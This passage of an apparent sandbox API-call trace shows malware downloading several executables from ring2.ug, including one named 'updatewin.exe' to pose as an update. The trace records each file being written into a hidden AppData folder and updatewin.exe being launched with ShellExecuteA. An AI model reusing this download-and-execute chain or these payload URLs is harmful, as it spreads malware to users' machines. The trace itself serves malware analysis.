lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0076.636] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://ring2.ug/files/penelop/updatewin.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0076.824] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0076.824] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x998d6d0, lpdwBufferLength=0x998d710, lpdwIndex=0x0 | out: lpBuffer=0x998d6d0*, lpdwBufferLength=0x998d710*=0x4, lpdwIndex=0x0) returned 1 [0076.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3a70 [0076.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eedc0 [0076.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3a70 | out: hHeap=0x680000) returned 1 [0076.825] lstrcpyA (in: lpString1=0x3189d68, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8" [0076.825] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8", pMore="updatewin.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin.exe") returned 1 [0076.825] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x759860 [0076.825] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6b8 [0076.830] SetFilePointer (in: hFile=0x6b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.830] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.848] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.850] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.881] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.882] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.891] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.891] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.915] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.915] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.928] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.929] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.932] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.932] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.933] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.933] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.934] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.934] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.950] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.951] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.957] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.957] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.974] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.974] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.979] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.979] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.980] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.980] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.981] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.981] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.991] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.991] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.999] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.999] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.014] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.015] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.019] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.019] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.023] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.024] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.024] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.025] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.025] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.026] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.034] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.034] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.035] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.035] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.036] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.036] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.037] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.037] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.038] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.039] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.040] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.040] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x1e00) returned 1 [0077.041] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x1e00, lpOverlapped=0x0) returned 1 [0077.041] CloseHandle (hObject=0x6b8) returned 1 [0077.044] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0077.049] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0077.049] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0077.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x759860 | out: hHeap=0x680000) returned 1 [0077.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eedc0 | out: hHeap=0x680000) returned 1 [0077.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0077.109] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0077.109] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3878 [0077.109] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x84e) returned 0x31cf750 [0077.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31c3878, cbMultiByte=-1, lpWideCharStr=0x31cf750, cchWideChar=1063 | out: lpWideCharStr="http://ring2.ug/files/penelop/3.exe") returned 36 [0077.109] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x850) returned 0x316f0d0 [0077.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0077.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3878 | out: hHeap=0x680000) returned 1 [0077.110] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x850) returned 0x31cf750 [0077.110] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x827) returned 0x31ce930 [0077.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring2.ug/files/penelop/3.exe", cchWideChar=-1, lpMultiByteStr=0x31ce930, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring2.ug/files/penelop/3.exe", lpUsedDefaultChar=0x0) returned 36 [0077.110] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0077.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce930 | out: hHeap=0x680000) returned 1 [0077.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0077.110] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://ring2.ug/files/penelop/3.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0077.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0077.280] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x998d6d0, lpdwBufferLength=0x998d710, lpdwIndex=0x0 | out: lpBuffer=0x998d6d0*, lpdwBufferLength=0x998d710*=0x4, lpdwIndex=0x0) returned 1 [0077.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0077.280] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0077.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3c30 [0077.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x84e) returned 0x31cf750 [0077.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31c3c30, cbMultiByte=-1, lpWideCharStr=0x31cf750, cchWideChar=1063 | out: lpWideCharStr="http://ring2.ug/files/penelop/4.exe") returned 36 [0077.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x850) returned 0x316f0d0 [0077.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0077.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3c30 | out: hHeap=0x680000) returned 1 [0077.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x850) returned 0x31cf750 [0077.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x827) returned 0x31ce930 [0077.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring2.ug/files/penelop/4.exe", cchWideChar=-1, lpMultiByteStr=0x31ce930, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring2.ug/files/penelop/4.exe", lpUsedDefaultChar=0x0) returned 36 [0077.281] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0077.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce930 | out: hHeap=0x680000) returned 1 [0077.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0077.281] InternetOpenUrlA (hInternet=0xcc0010, lpszUrl="http://ring2.ug/files/penelop/4.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0077.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0077.458] HttpQueryInfoW (in: hRequest=0xcc0018, dwInfoLevel=0x20000013, lpBuffer=0x998d6d0, lpdwBufferLength=0x998d710, lpdwIndex=0x0 | out: lpBuffer=0x998d6d0*, lpdwBufferLength=0x998d710*=0x4, lpdwIndex=0x0) returned 1 [0077.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0077.458] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc001c [0077.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3ca0 [0077.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x84e) returned 0x31cf750 [0077.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31c3ca0, cbMultiByte=-1, lpWideCharStr=0x31cf750, cchWideChar=1063 | out: lpWideCharStr="http://ring2.ug/files/penelop/5.exe") returned 36 [0077.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x850) returned 0x316f0d0 [0077.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0077.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3ca0 | out: hHeap=0x680000) returned 1 [0077.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x850) returned 0x31cf750 [0077.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x827) returned 0x31ce930 [0077.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring2.ug/files/penelop/5.exe", cchWideChar=-1, lpMultiByteStr=0x31ce930, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring2.ug/files/penelop/5.exe", lpUsedDefaultChar=0x0) returned 36 [0077.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0077.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce930 | out: hHeap=0x680000) returned 1 [0077.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0077.458] InternetOpenUrlA (hInternet=0xcc001c, lpszUrl="http://ring2.ug/files/penelop/5.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0024 [0077.678] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0077.679] HttpQueryInfoW (in: hRequest=0xcc0024, dwInfoLevel=0x20000013, lpBuffer=0x998d6d0, lpdwBufferLength=0x998d710, lpdwIndex=0x0 | out: lpBuffer=0x998d6d0*, lpdwBufferLength=0x998d710*=0x4, lpdwIndex=0x0) returned 1 [0077.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3d48 [0077.679] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3d48 | out: hHeap=0x680000) returned 1 [0077.679] lstrcpyA (in: lpString1=0x3189d68, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8" [0077.679] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8", pMore="5.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\5.exe") returned 1 [0077.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x759860 [0077.679] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\57db73de-989a-4393-870b-10752e4771b8\\5.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6b8 [0077.679] SetFilePointer (in: hFile=0x6b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.679] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.702] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, 